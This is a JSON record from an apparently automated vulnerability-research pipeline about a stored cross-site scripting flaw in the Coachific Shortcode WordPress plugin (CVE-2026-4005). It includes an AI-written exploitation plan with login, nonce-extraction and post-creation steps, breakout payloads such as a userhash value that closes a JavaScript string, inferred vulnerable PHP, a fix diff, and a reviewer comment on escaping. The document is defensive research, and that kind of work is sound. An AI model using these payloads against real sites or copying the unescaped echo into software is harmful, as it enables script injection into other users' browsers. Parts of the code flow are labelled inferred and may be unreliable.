[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fyljsn_cXDzQJ0Ydqu3Y062StOvo2B2Xi-_3g3z8j6f8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-4005","coachific-shortcode-authenticated-contributor-stored-cross-site-scripting-via-userhash-shortcode-attribute","Coachific Shortcode \u003C= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'userhash' Shortcode Attribute","The Coachific Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'userhash' shortcode attribute in all versions up to and including 1.0. This is due to insufficient input sanitization and output escaping. The plugin uses sanitize_text_field() on the 'userhash' parameter, which strips HTML tags but does not escape characters significant in a JavaScript string context (such as double quotes, semicolons, and parentheses). The sanitized value is then directly interpolated into a JavaScript string within a \u003Cscript> tag on line 29 without any JavaScript-specific escaping (e.g., wp_json_encode() or esc_js()). 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","coachific-shortcode",null,"\u003C=1.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-14 19:47:11","2026-04-15 08:28:14",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3d91158c-0b34-460e-9fdb-b99165ebca78?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-4005 (Coachific Shortcode XSS)\n\n## 1. Vulnerability Summary\nThe **Coachific Shortcode** plugin (versions \u003C= 1.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to properly escape the `userhash` attribute of its shortcode when outputting it inside a `\u003Cscript>` tag on line 29 of the processing file. While the plugin uses `sanitize_text_field()` on the input, this function is insufficient for JavaScript contexts as it does not escape characters like single quotes (`'`), which can be used to break out of a JavaScript string literal.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** WordPress Post\u002FPage Editor (`wp-admin\u002Fpost.php` or `wp-admin\u002Fpost-new.php`).\n*   **Shortcode:** `[coachific_shortcode]` (inferred) or similar, using the `userhash` attribute.\n*   **Attribute:** `userhash`.\n*   **Authentication Level:** Authenticated (Contributor+). Contributors can create posts and embed shortcodes.\n*   **Preconditions:** The plugin must be active. A Contributor or higher user must be able to save a post containing the malicious shortcode.\n\n## 3. Code Flow (Inferred)\n1.  
**Registration:** The plugin registers a shortcode, likely via `add_shortcode( 'coachific_shortcode', 'handler_function' )` in the main plugin file.\n2.  **Processing:** When a post containing `[coachific_shortcode userhash=\"...\"]` is viewed, the handler function is triggered.\n3.  **Sanitization:** The handler retrieves the attributes and applies `sanitize_text_field( $atts['userhash'] )`.\n4.  **Vulnerable Sink (Line 29):** The sanitized `$userhash` is echoed directly into a `\u003Cscript>` block:\n    ```php\n    \u002F\u002F Inferred logic based on vulnerability description\n    echo \"\u003Cscript type='text\u002Fjavascript'>\";\n    echo \"var coachific_user_hash = '\" . $userhash . \"';\"; \u002F\u002F Line 29\n    echo \"\u003C\u002Fscript>\";\n    ```\n5.  **Execution:** Because `sanitize_text_field` allows single quotes, an attacker can provide a payload like `';alert(1)\u002F\u002F` to terminate the string and execute arbitrary JS.\n\n## 4. Nonce Acquisition Strategy (Authenticated)\nSince this exploit requires **Contributor-level** access to save a post, the agent must simulate an authenticated session.\n\n1.  **Login:** Perform a login to `wp-login.php` using Contributor credentials.\n2.  **Access Editor:** Navigate to `wp-admin\u002Fpost-new.php` to initiate a new post creation.\n3.  **Extract Nonces:** Use `browser_eval` to extract the necessary nonces for post creation\u002Fsaving:\n    - `document.querySelector('#_wpnonce').value` (for standard post submission).\n    - Or extract from the `wp-admin` page source if using the REST API \u002F Gutenberg.\n4.  **Intercept\u002FIdentify Action:** Standard WordPress post creation uses `action=editpost` or a REST API call to `wp-json\u002Fwp\u002Fv2\u002Fposts`.\n\n## 5. 
Exploitation Strategy\nThe goal is to store a shortcode that executes XSS when the post is rendered.\n\n### Step 1: Authentication\nUse the `http_request` tool to log in as a Contributor.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-login.php`\n*   **Body:** `log=contributor&pwd=password&wp-submit=Log+In&testcookie=1`\n*   **Header:** `Content-Type: application\u002Fx-www-form-urlencoded`\n\n### Step 2: Obtain Post Nonce\nNavigate to `wp-admin\u002Fpost-new.php` and extract the `_wpnonce`.\n*   **Action:** `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost-new.php\")`\n*   **Tool:** `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n\n### Step 3: Inject Stored XSS\nCreate a post containing the malicious shortcode.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php`\n*   **Method:** POST\n*   **Body (URL Encoded):**\n    ```\n    action=editpost\n    &post_ID=[NEW_POST_ID]\n    &_wpnonce=[EXTRACTED_NONCE]\n    &post_title=XSS_Test\n    &content=[coachific_shortcode userhash=\"';alert(document.domain)\u002F\u002F\"]\n    &publish=Publish\n    ```\n*   **Note:** If the exact shortcode name is unknown, the agent should first run `grep -r \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fcoachific-shortcode\u002F` to find the registered tag.\n\n### Step 4: Trigger Execution\nNavigate to the newly created post's frontend URL.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID]`\n*   **Observation:** The browser should execute `alert(document.domain)`.\n\n## 6. Test Data Setup\n1.  **User Creation:** Create a user with the `contributor` role.\n    - `wp user create contributor contributor@example.com --role=contributor --user_pass=password`\n2.  **Plugin Activation:** Ensure the plugin is active.\n    - `wp plugin activate coachific-shortcode`\n\n## 7. 
Expected Results\n*   The HTML source of the rendered post should contain:\n    ```html\n    \u003Cscript type='text\u002Fjavascript'>var coachific_user_hash = '';alert(document.domain)\u002F\u002F';\u003C\u002Fscript>\n    ```\n*   An alert box with the site's domain should appear in the browser context.\n\n## 8. Verification Steps\n1.  **Verify Storage:** Use WP-CLI to check if the payload is in the database.\n    - `wp post get [POST_ID] --field=post_content`\n2.  **Verify Output:** Use `http_request` to fetch the post content and check for the broken-out `\u003Cscript>` tag.\n    - `grep \"alert(document.domain)\" response_body`\n\n## 9. Alternative Approaches\n*   **Double Quote Breakout:** If the plugin uses double quotes `var h = \"[userhash]\";`, use payload `\");alert(1)\u002F\u002F`.\n*   **Attribute Breakout:** If `sanitize_text_field` is more aggressive, try breaking out of the script tag itself if possible (though description says it's inside the string): `\u003C\u002Fscript>\u003Cscript>alert(1)\u003C\u002Fscript>`.\n*   **Shortcode Name Hunt:** If `[coachific_shortcode]` fails, search for the `add_shortcode` call in the plugin directory to find the exact tag and attribute names. (e.g., `grep -rn \"add_shortcode\" .`)","The Coachific Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'userhash' shortcode attribute. This occurs because the plugin fails to properly escape user-provided input before outputting it inside a JavaScript string literal within a \u003Cscript> tag, allowing contributors to execute arbitrary JavaScript in the context of other users' sessions.","\u002F\u002F coachific-shortcode.php or associated shortcode handler file\n\n$userhash = sanitize_text_field( $atts['userhash'] );\n\necho \"\u003Cscript type='text\u002Fjavascript'>\";\n\u002F\u002F Line 29\necho \"var coachific_user_hash = '\" . $userhash . 
\"';\";\necho \"\u003C\u002Fscript>\";","--- coachific-shortcode.php\n+++ coachific-shortcode.php\n@@ -26,4 +26,4 @@\n $userhash = sanitize_text_field( $atts['userhash'] );\n echo \"\u003Cscript type='text\u002Fjavascript'>\";\n-echo \"var coachific_user_hash = '\" . $userhash . \"';\";\n+echo \"var coachific_user_hash = '\" . esc_js( $userhash ) . \"';\";\n echo \"\u003C\u002Fscript>\";","The exploit is performed by an authenticated user with at least Contributor-level access. The attacker targets the WordPress post editor (wp-admin\u002Fpost-new.php) and inserts a shortcode using the 'userhash' attribute. Because the plugin only applies sanitize_text_field() to this attribute, characters like single quotes are not stripped. A payload such as [coachific_shortcode userhash=\"';alert(1)\u002F\u002F\"] is used to terminate the existing JavaScript string variable assignment and execute arbitrary code. Once the post is saved and viewed by any user, the malicious payload triggers automatically in the victim's browser.","gemini-3-flash-preview","2026-04-16 15:38:44","2026-04-16 15:39:04",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcoachific-shortcode\u002Ftags"]
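Review bot: the `+echo` line in the hunk relies on `esc_js()` being applied to a value that sits inside a single-quoted JavaScript string literal, which is exactly the context WordPress documents `esc_js()` for (it backslash-escapes single quotes and entity-encodes `<`, `>` and `"`, so both the `';...` breakout and a `</script>` breakout are closed), but this correctness is coupled to the surrounding quote style and would need re-review if the literal were ever changed to a template literal or built differently. Consider the quote-independent form `echo 'var coachific_user_hash = ' . wp_json_encode( $userhash ) . ';';`, which emits a valid JS string literal on its own, and in either case add a one-line comment above the echo noting that the value is in a JS-string context so the next maintainer does not swap the escaper for `esc_html()` or `esc_attr()`.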